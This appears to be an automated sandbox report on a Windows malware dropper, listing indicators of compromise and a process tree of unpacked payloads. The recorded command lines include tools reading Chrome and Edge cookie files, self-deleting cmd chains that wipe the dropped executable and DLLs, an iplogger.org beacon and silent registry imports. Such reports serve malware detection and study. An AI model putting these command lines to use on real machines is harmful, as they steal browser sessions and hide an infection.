description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 sonia_3.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e sonia_3.exe -
NTFS ADS 2 IoCs
description ioc Process File created C:\ProgramData\BNKIBJUQX4H2CQ2R.exe:Zone.Identifier D880.exe File opened for modification C:\ProgramData\BNKIBJUQX4H2CQ2R.exe:Zone.Identifier D880.exe -
Runs .reg file with regedit 2 IoCs
pid Process 5956 regedit.exe 4464 regedit.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 4328 PING.EXE 4992 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3952 sonia_2.exe 3952 sonia_2.exe 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe 4092 svchost.exe 4092 svchost.exe 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 3048 Process not Found 3048 Process not Found 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 3048 Process not Found 3048 Process not Found 4252 WerFault.exe 4252 WerFault.exe 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3048 Process not Found -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 3952 sonia_2.exe 208 huratfj 4480 Acre.exe.com 3496 Acre.exe.com 6120 huratfj 5228 huratfj -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2840 sonia_4.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 4092 svchost.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeAuditPrivilege 2380 svchost.exe Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeDebugPrivilege 4252 WerFault.exe Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeRestorePrivilege 4740 WerFault.exe Token: SeBackupPrivilege 4740 WerFault.exe Token: SeBackupPrivilege 4740 WerFault.exe Token: SeDebugPrivilege 4740 WerFault.exe Token: SeDebugPrivilege 2288 WerFault.exe Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeDebugPrivilege 4412 WerFault.exe Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeDebugPrivilege 4300 WerFault.exe Token: SeDebugPrivilege 4272 taskkill.exe Token: SeDebugPrivilege 4260 WerFault.exe Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeDebugPrivilege 4972 OLKbrowser.exe Token: SeShutdownPrivilege 3048 Process not Found -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3048 Process not Found 3048 Process not Found -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 3048 Process not Found 5156 MicrosoftEdge.exe 5576 MicrosoftEdgeCP.exe 5576 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2208 wrote to memory of 2836 2208 8 (30).exe 76 PID 2208 wrote to memory of 2836 2208 8 (30).exe 76 PID 2208 wrote to memory of 2836 2208 8 (30).exe 76 PID 2836 wrote to memory of 4032 2836 setup_installer.exe 77 PID 2836 wrote to memory of 4032 2836 setup_installer.exe 77 PID 2836 wrote to memory of 4032 2836 setup_installer.exe 77 PID 4032 wrote to memory of 3568 4032 setup_install.exe 118 PID 4032 wrote to memory of 3568 4032 setup_install.exe 118 PID 4032 wrote to memory of 3568 4032 setup_install.exe 118 PID 4032 wrote to memory of 500 4032 setup_install.exe 80 PID 4032 wrote to memory of 500 4032 setup_install.exe 80 PID 4032 wrote to memory of 500 4032 setup_install.exe 80 PID 4032 wrote to memory of 1256 4032 setup_install.exe 81 PID 4032 wrote to memory of 1256 4032 setup_install.exe 81 PID 4032 wrote to memory of 1256 4032 setup_install.exe 81 PID 4032 wrote to memory of 2072 4032 setup_install.exe 93 PID 4032 wrote to memory of 2072 4032 setup_install.exe 93 PID 4032 wrote to memory of 2072 4032 setup_install.exe 93 PID 4032 wrote to memory of 2140 4032 setup_install.exe 82 PID 4032 wrote to memory of 2140 4032 setup_install.exe 82 PID 4032 wrote to memory of 2140 4032 setup_install.exe 82 PID 4032 wrote to memory of 4076 4032 setup_install.exe 83 PID 4032 wrote to memory of 4076 4032 setup_install.exe 83 PID 4032 wrote to memory of 4076 4032 setup_install.exe 83 PID 4032 wrote to memory of 1172 4032 setup_install.exe 84 PID 4032 wrote to memory of 1172 4032 setup_install.exe 84 PID 4032 wrote to memory of 1172 4032 setup_install.exe 84 PID 3568 wrote to memory of 2084 3568 kGPLQ7M8fqAHElYq3fSV5UnL.exe 85 PID 3568 wrote to memory of 2084 3568 kGPLQ7M8fqAHElYq3fSV5UnL.exe 85 PID 3568 wrote to memory of 2084 3568 kGPLQ7M8fqAHElYq3fSV5UnL.exe 85 PID 1256 wrote to memory of 1436 1256 cmd.exe 86 PID 1256 wrote to memory of 1436 1256 cmd.exe 86 PID 1256 wrote to memory of 1436 1256 cmd.exe 86 PID 500 wrote to memory of 3952 500 cmd.exe 87 PID 500 wrote to memory of 3952 500 cmd.exe 87 PID 500 wrote to memory of 3952 500 cmd.exe 87 PID 4076 wrote to memory of 1120 4076 cmd.exe 92 PID 4076 wrote to memory of 1120 4076 cmd.exe 92 PID 4076 wrote to memory of 1120 4076 cmd.exe 92 PID 2072 wrote to memory of 2840 2072 cmd.exe 88 PID 2072 wrote to memory of 2840 2072 cmd.exe 88 PID 2140 wrote to memory of 3960 2140 cmd.exe 89 PID 2140 wrote to memory of 3960 2140 cmd.exe 89 PID 2140 wrote to memory of 3960 2140 cmd.exe 89 PID 2084 wrote to memory of 4016 2084 sonia_1.exe 99 PID 2084 wrote to memory of 4016 2084 sonia_1.exe 99 PID 2084 wrote to memory of 4016 2084 sonia_1.exe 99 PID 2840 wrote to memory of 3660 2840 sonia_4.exe 150 PID 2840 wrote to memory of 3660 2840 sonia_4.exe 150 PID 2840 wrote to memory of 3660 2840 sonia_4.exe 150 PID 1684 wrote to memory of 3860 1684 Process not Found 138 PID 1684 wrote to memory of 3860 1684 Process not Found 138 PID 1684 wrote to memory of 3860 1684 Process not Found 138 PID 3860 wrote to memory of 4092 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe 70 PID 3860 wrote to memory of 2604 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe 18 PID 4092 wrote to memory of 4016 4092 svchost.exe 99 PID 4092 wrote to memory of 4016 4092 svchost.exe 99 PID 4092 wrote to memory of 4016 4092 svchost.exe 99 PID 3660 wrote to memory of 4120 3660 explorer.exe 106 PID 3660 wrote to memory of 4120 3660 explorer.exe 106 PID 3660 wrote to memory of 4120 3660 explorer.exe 106 PID 3860 wrote to memory of 996 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe 54 PID 3660 wrote to memory of 4192 3660 explorer.exe 105 PID 3660 wrote to memory of 4192 3660 explorer.exe 105
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2724
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2712
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2604
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2368
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1924
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1380
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1368
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1164
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
- Modifies registry class
PID:1112
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:344 -
C:\Users\Admin\AppData\Roaming\huratfjC:\Users\Admin\AppData\Roaming\huratfj2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:208
-
-
C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exeC:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:7324 -
C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exeC:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task3⤵PID:496
-
-
-
C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exeC:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:5300 -
C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exeC:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task3⤵PID:6952
-
-
-
C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exeC:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:6180 -
C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exeC:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task3⤵PID:4944
-
-
-
C:\Users\Admin\AppData\Roaming\huratfjC:\Users\Admin\AppData\Roaming\huratfj2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6120
-
-
C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exeC:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:5116 -
C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exeC:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task3⤵PID:7572
-
-
-
C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exeC:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:5568 -
C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exeC:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task3⤵PID:5692
-
-
-
C:\Users\Admin\AppData\Roaming\huratfjC:\Users\Admin\AppData\Roaming\huratfj2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5228
-
-
C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exeC:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:7576 -
C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exeC:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task3⤵PID:5164
-
-
-
C:\Users\Admin\AppData\Local\Temp\8 (30).exe"C:\Users\Admin\AppData\Local\Temp\8 (30).exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_2.exe4⤵
- Suspicious use of WriteProcessMemory
PID:500 -
C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\sonia_2.exesonia_2.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_3.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\sonia_3.exesonia_3.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
PID:1436 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im sonia_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\sonia_3.exe" & del C:\ProgramData\*.dll & exit6⤵PID:4744
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sonia_3.exe /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4272
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
PID:3516
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_5.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\sonia_5.exesonia_5.exe5⤵
- Executes dropped EXE
- Checks computer location settings
PID:3960 -
C:\Users\Admin\Documents\kGPLQ7M8fqAHElYq3fSV5UnL.exe"C:\Users\Admin\Documents\kGPLQ7M8fqAHElYq3fSV5UnL.exe"6⤵
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Users\Admin\Documents\kGPLQ7M8fqAHElYq3fSV5UnL.exeC:\Users\Admin\Documents\kGPLQ7M8fqAHElYq3fSV5UnL.exe7⤵
- Executes dropped EXE
PID:5148
-
-
C:\Users\Admin\Documents\kGPLQ7M8fqAHElYq3fSV5UnL.exeC:\Users\Admin\Documents\kGPLQ7M8fqAHElYq3fSV5UnL.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:2216 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im kGPLQ7M8fqAHElYq3fSV5UnL.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\kGPLQ7M8fqAHElYq3fSV5UnL.exe" & del C:\ProgramData\*.dll & exit8⤵
- Loads dropped DLL
PID:6528 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im kGPLQ7M8fqAHElYq3fSV5UnL.exe /f9⤵
- Kills process with taskkill
PID:1256
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
PID:7828
-
-
-
-
-
C:\Users\Admin\Documents\jSdaT5nE0b8JDQ5TWF1Gy4dL.exe"C:\Users\Admin\Documents\jSdaT5nE0b8JDQ5TWF1Gy4dL.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4936 -
C:\Users\Admin\Documents\jSdaT5nE0b8JDQ5TWF1Gy4dL.exeC:\Users\Admin\Documents\jSdaT5nE0b8JDQ5TWF1Gy4dL.exe7⤵
- Executes dropped EXE
PID:3880
-
-
-
C:\Users\Admin\Documents\VkpE1gRngNXFU0Cn05vHerv0.exe"C:\Users\Admin\Documents\VkpE1gRngNXFU0Cn05vHerv0.exe"6⤵
- Executes dropped EXE
PID:416 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp7⤵PID:4600
-
C:\Windows\SysWOW64\cmd.execmd8⤵PID:4664
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp9⤵PID:4392
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.comAcre.exe.com k9⤵
- Executes dropped EXE
PID:4164 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k10⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:4480 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe11⤵PID:6728
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 309⤵
- Runs ping.exe
PID:4328
-
-
-
-
-
C:\Users\Admin\Documents\ACiNVstKWjR5KeuROoPr2s5O.exe"C:\Users\Admin\Documents\ACiNVstKWjR5KeuROoPr2s5O.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4616 -
C:\Users\Admin\Documents\ACiNVstKWjR5KeuROoPr2s5O.exeC:\Users\Admin\Documents\ACiNVstKWjR5KeuROoPr2s5O.exe7⤵
- Executes dropped EXE
PID:3400
-
-
C:\Users\Admin\Documents\ACiNVstKWjR5KeuROoPr2s5O.exeC:\Users\Admin\Documents\ACiNVstKWjR5KeuROoPr2s5O.exe7⤵
- Executes dropped EXE
PID:500
-
-
-
C:\Users\Admin\Documents\uPzycWHt5eiu5PHtDDY4fwTI.exe"C:\Users\Admin\Documents\uPzycWHt5eiu5PHtDDY4fwTI.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3860 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:6544
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:7100
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:7472
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:7900
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:6960
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:5252
-
-
-
C:\Users\Admin\Documents\wa5IqaoARMeCfzk5EGmIb5Jc.exe"C:\Users\Admin\Documents\wa5IqaoARMeCfzk5EGmIb5Jc.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4012 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "7⤵PID:2200
-
C:\Windows\SysWOW64\explorer.exeexplorer https://iplogger.org/2LBCU68⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3660
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s adj.reg8⤵
- Runs .reg file with regedit
PID:5956
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s adj2.reg8⤵
- Runs .reg file with regedit
PID:4464
-
-
-
C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"7⤵
- Executes dropped EXE
PID:4384
-
-
-
C:\Users\Admin\Documents\rJhZg0bwisK5bP7bLxUHp2lu.exe"C:\Users\Admin\Documents\rJhZg0bwisK5bP7bLxUHp2lu.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4104 -
C:\Users\Admin\AppData\Roaming\1234.exeC:\Users\Admin\AppData\Roaming\1234.exe 12347⤵
- Suspicious use of SetThreadContext
PID:7616 -
C:\Users\Admin\AppData\Roaming\1234.exe"{path}"8⤵PID:6712
-
-
-
-
C:\Users\Admin\Documents\7jiLTiYSFXtwlgQxL3sEkMT6.exe"C:\Users\Admin\Documents\7jiLTiYSFXtwlgQxL3sEkMT6.exe"6⤵
- Executes dropped EXE
PID:5144 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"7⤵
- Executes dropped EXE
PID:5516 -
C:\Users\Admin\AppData\Local\Temp\7zSC85C94F4\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC85C94F4\setup_install.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5712 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c karotima_2.exe9⤵PID:5920
-
C:\Users\Admin\AppData\Local\Temp\7zSC85C94F4\karotima_2.exekarotima_2.exe10⤵
- Executes dropped EXE
PID:6024 -
C:\Users\Admin\AppData\Local\Temp\7zSC85C94F4\karotima_2.exe"C:\Users\Admin\AppData\Local\Temp\7zSC85C94F4\karotima_2.exe" -a11⤵
- Executes dropped EXE
PID:5188
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c karotima_1.exe9⤵PID:5904
-
C:\Users\Admin\AppData\Local\Temp\7zSC85C94F4\karotima_1.exekarotima_1.exe10⤵
- Executes dropped EXE
- Checks computer location settings
